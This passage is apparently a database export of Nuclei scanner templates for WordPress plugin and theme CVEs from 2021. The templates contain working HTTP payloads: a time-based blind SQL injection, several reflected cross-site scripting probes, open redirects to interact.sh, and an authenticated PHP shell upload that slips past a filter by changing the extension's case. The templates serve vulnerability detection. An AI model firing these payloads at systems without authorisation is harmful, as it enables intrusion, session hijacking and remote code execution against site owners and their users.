description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.\n remediation: |\n Update to WordPress Statistics plugin version 13.0.8 or later to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49894\n - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/\n - https://github.com/Udyz/WP-Statistics-BlindSQL\n - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24340\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24340\n cwe-id: CWE-89\n epss-score: 0.01937\n epss-percentile: 0.88371\n cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: veronalabs\n product: wp_statistics\n framework: wordpress\n tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 15s\n GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 200'\n - 'contains(body_1, \"WP Statistics\")'\n condition: and\n\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 500'\n - 'contains(body_2, \">WordPress › Error<\") && contains(body_2, \">Your request is not valid.<\")'\n condition: and\n# digest: 4a0a004730450220183a03e620c9440c35b2d6073fdd8fd311debe078d409ad5ab0ed7b02f68cd81022100e1fdb85b5428e6dd55de5a162d0347cdc3c6ae247a909958c290934224079b62:922c64590222798bb761d5b6d8e72950", "hash": "27dc22bbf9d9334b4d45f6deb54794be", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b2" }, "name": "CVE-2021-24342.yaml", "content": "id: CVE-2021-24342\n\ninfo:\n name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24342\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24342\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: jnews\n product: jnews\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/themes/jnews/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Change Log:'\n - 'JNews -'\n condition: and\n\n - raw:\n - |\n POST /?ajax-request=jnews HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n lang=en_US&cat_id=6\">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220698e69643ac31b2c0e4dc76eb0b904ce125dfe060203e3ab4768f00d20ef8f30022100a531cb557e30a01d688ad9803cada5532b7663e3bab4bccf9eb8d9f2c76e1b20:922c64590222798bb761d5b6d8e72950", "hash": "4bf784b5a7a2346507f3f1f62e27da54", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b3" }, "name": "CVE-2021-24347.yaml", "content": "id: CVE-2021-24347\n\ninfo:\n name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload\n author: theamanrawat\n severity: high\n description: |\n WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.\n remediation: Fixed in version 4.22.\n reference:\n - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a\n - https://wordpress.org/plugins/sp-client-document-manager/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24347\n - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-24347\n cwe-id: CWE-178\n epss-score: 0.97036\n epss-percentile: 0.99699\n cpe: cpe:2.3:a:smartypantsplugins:sp_project_\\&_document_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: smartypantsplugins\n product: sp_project_\\&_document_manager\n framework: wordpress\n tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n {{nonce}}\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"_wp_http_referer\"\n\n /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\n Content-Type: image/svg+xml\n\n \n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\n Upload\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n - |\n GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(header_4, \"text/html\")\n - status_code_4 == 200\n - contains(body_4, \"CVE-2021-24347\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\"\n internal: true\n# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950", "hash": "d78a6ec98b7de4f380d3bc416f2265ab", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b4" }, "name": "CVE-2021-24351.yaml", "content": "id: CVE-2021-24351\n\ninfo:\n name: WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting\n author: Maximus Decimus\n severity: medium\n description: |\n WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016\n - https://theplusaddons.com/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24351\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/JoshMorrison99/my-nuceli-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24351\n cwe-id: CWE-79\n epss-score: 0.00154\n epss-percentile: 0.50743\n cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: posimyth\n product: the_plus_addons_for_elementor\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"the-plus-addons-for-elementor\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b0eaf8ef2a2056147b9485f4d77a8844b65eac6cfb6216d78f3290313d7a3c0d0221008186ee4d441d90db81008c8d1396a431a4347efa93ae3069c01eab7a2b1ee18f:922c64590222798bb761d5b6d8e72950", "hash": "05fe9809d58cf4bca08ce5c7c47bf6f3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b5" }, "name": "CVE-2021-24358.yaml", "content": "id: CVE-2021-24358\n\ninfo:\n name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.\n impact: |\n This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities.\n remediation: |\n Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24358\n - https://theplusaddons.com/changelog/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24358\n cwe-id: CWE-601\n epss-score: 0.00329\n epss-percentile: 0.70388\n cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: posimyth\n product: the_plus_addons_for_elementor\n framework: wordpress\n tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth\n\nhttp:\n - raw:\n - |\n GET /?author=1 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n extractors:\n - type: regex\n name: username\n group: 1\n regex:\n - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>'\n internal: true\n part: body\n\n - type: regex\n name: username\n group: 1\n regex:\n - 'ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/'\n internal: true\n part: header\n# digest: 4b0a00483046022100ae75d3fbb605efbbfe6ae9894ef9afa56a51b9d9be1cc299773a592741ef9fcf022100cd029992f746d9d353355c06400c8a7246c94a86df04621081ef99421a51cd76:922c64590222798bb761d5b6d8e72950", "hash": "393b669ed525216dfc06483b7b4ca181", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b6" }, "name": "CVE-2021-24364.yaml", "content": "id: CVE-2021-24364\n\ninfo:\n name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24364\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/crpytoscooby/resourses_web\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24364\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tielabs\n product: jannah\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/jannah/assets/'\n - 'attachment-jannah-image-'\n condition: or\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202b0c692d7f7fa8aecd2a0875cfbb10abcb21fd710aca2b36e29f1734b928142f022006cacf7134c58b067595e9ae0db5668660eae1fe56cdbc1df62c4b28f244bc25:922c64590222798bb761d5b6d8e72950", "hash": "b8a29d6fd081f02b6792490cc706e29f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b7" }, "name": "CVE-2021-24370.yaml", "content": "id: CVE-2021-24370\n\ninfo:\n name: WordPress Fancy Product Designer <4.6.9 - Arbitrary File Upload\n author: pikpikcu\n severity: critical\n description: |\n WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication.\n impact: |\n Attackers can upload malicious files and execute arbitrary code on the target system.\n remediation: |\n Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability.\n reference:\n - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/\n - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38\n - https://seclists.org/fulldisclosure/2020/Nov/30\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24370\n - https://www.secpod.com/blog/critical-zero-day-flaw-actively-exploited-in-wordpress-fancy-product-designer-plugin/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24370\n cwe-id: CWE-434\n epss-score: 0.11015\n epss-percentile: 0.95013\n cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: radykal\n product: fancy_product_designer\n framework: wordpress\n google-query: inurl:“/wp-content/plugins/fancy-product-designer”\n tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"error\":\"You need to define a directory'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c2a776e835f61bf3a78c76dd792d53c9c3bcfaf7974a24228b4f5e0a66ab0f2902210097e6ed969dab62237e84218f8f15915a107d24ce90adc20993b9d949a9e68aa4:922c64590222798bb761d5b6d8e72950", "hash": "8933d9a87dec6e3b5775823f14f9c3b2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b8" }, "name": "CVE-2021-24387.yaml", "content": "id: CVE-2021-24387\n\ninfo:\n name: WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting\n author: suman_kar\n severity: medium\n description: |\n WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update WordPress Pro Real Estate 7 Theme to version 3.1.1 or later to mitigate the vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2021070041\n - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745\n - https://contempothemes.com/wp-real-estate-7/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24387\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24387\n cwe-id: CWE-79\n epss-score: 0.00154\n epss-percentile: 0.50743\n cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: contempothemes\n product: real_estate_7\n framework: wordpress\n tags: cve,cve2021,xss,wordpress,wpscan,contempothemes\n\nhttp:\n - raw:\n - |\n GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '/wp-content/themes/realestate'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f6ed5d60c3d6fca4ea545a03f032d233384e4f202567758cc149f6ae9027fa0b0220774c944fc42cfeb9f74d77f0c613d54501ce5801e8b14c88c28ce9dc8bd6d38a:922c64590222798bb761d5b6d8e72950", "hash": "9a4a9bcb941cf91e3374d6d5e775e7da", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b9" }, "name": "CVE-2021-24389.yaml", "content": "id: CVE-2021-24389\n\ninfo:\n name: WordPress FoodBakery <2.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress FoodBakery plugin to version 2.2 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24389\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24389\n cwe-id: CWE-79\n epss-score: 0.00168\n epss-percentile: 0.526\n cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: chimpgroup\n product: foodbakery\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,chimpgroup\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b4a8c7559626a77bfa47ee663ee467fa30606c548c3616ff98aede7b7bd85964022100cf1e469fd9edd5275e71a159d792cbfe59e5a69410ac5cec9aa2b300e97c6e44:922c64590222798bb761d5b6d8e72950", "hash": "a1d6a607a8bc32243fcf42677dc4ce28", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ba" }, "name": "CVE-2021-24406.yaml", "content": "id: CVE-2021-24406\n\ninfo:\n name: WordPress wpForo Forum < 1.9.7 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.\n remediation: |\n Update wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24406\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24406\n cwe-id: CWE-601\n epss-score: 0.00137\n epss-percentile: 0.48279\n cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: gvectors\n product: wpforo_forum\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,redirect,gvectors\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 490a004630440220210c513d35e61e20ff58b5cd0035629cfc8606dffc895528b2da962e129fa1b50220150066296aa3e0d1aa5ab2717d86c5f46f4884e4b3a95a854377574c49fc196c:922c64590222798bb761d5b6d8e72950", "hash": "94717d2a1b3d3e1d7ccd7c497809aabd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bb" }, "name": "CVE-2021-24407.yaml", "content": "id: CVE-2021-24407\n\ninfo:\n name: WordPress Jannah Theme <5.4.5 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update the Jannah Theme to version 5.4.5 or later, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24407\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24407\n cwe-id: CWE-79\n epss-score: 0.00207\n epss-percentile: 0.58055\n cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tielabs\n product: jannah\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/jannah/assets/'\n - 'attachment-jannah-image-'\n condition: or\n\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n\n action=tie_ajax_search&query[]=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a876f00fdc3eb21c7cf5e9e9c5227ff39b40d55af7669f205a6def322179eefb02202ba5e17e0f6a3f89085d5e0b0cb91635833014c28a5395d68a513213a0787da4:922c64590222798bb761d5b6d8e72950", "hash": "9deaf3ea84417ca5d8bc2810d16c4433", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bc" }, "name": "CVE-2021-24409.yaml", "content": "id: CVE-2021-24409\n\ninfo:\n name: Prismatic < 2.8 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.\n remediation: Fixed in version 2.8\n reference:\n - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24409\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24409\n cwe-id: CWE-79\n epss-score: 0.00161\n epss-percentile: 0.51755\n cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plugin-planet\n product: prismatic\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/prismatic\"\n tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"Leave A Review?\")'\n - 'contains(body_2, \"onanimationend=alert(document.domain)\")'\n condition: and\n# digest: 4b0a00483046022100b3a272b73b275993030f6cb84ddacf46958fd51cea8bbee3478f27a93413c9a9022100a4d5c436e634b4c03e12c36e668f37d9d2b56c11fc8527edf562c96413535d16:922c64590222798bb761d5b6d8e72950", "hash": "78f20766bddb22a7049e7c696c6a48ce", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bd" }, "name": 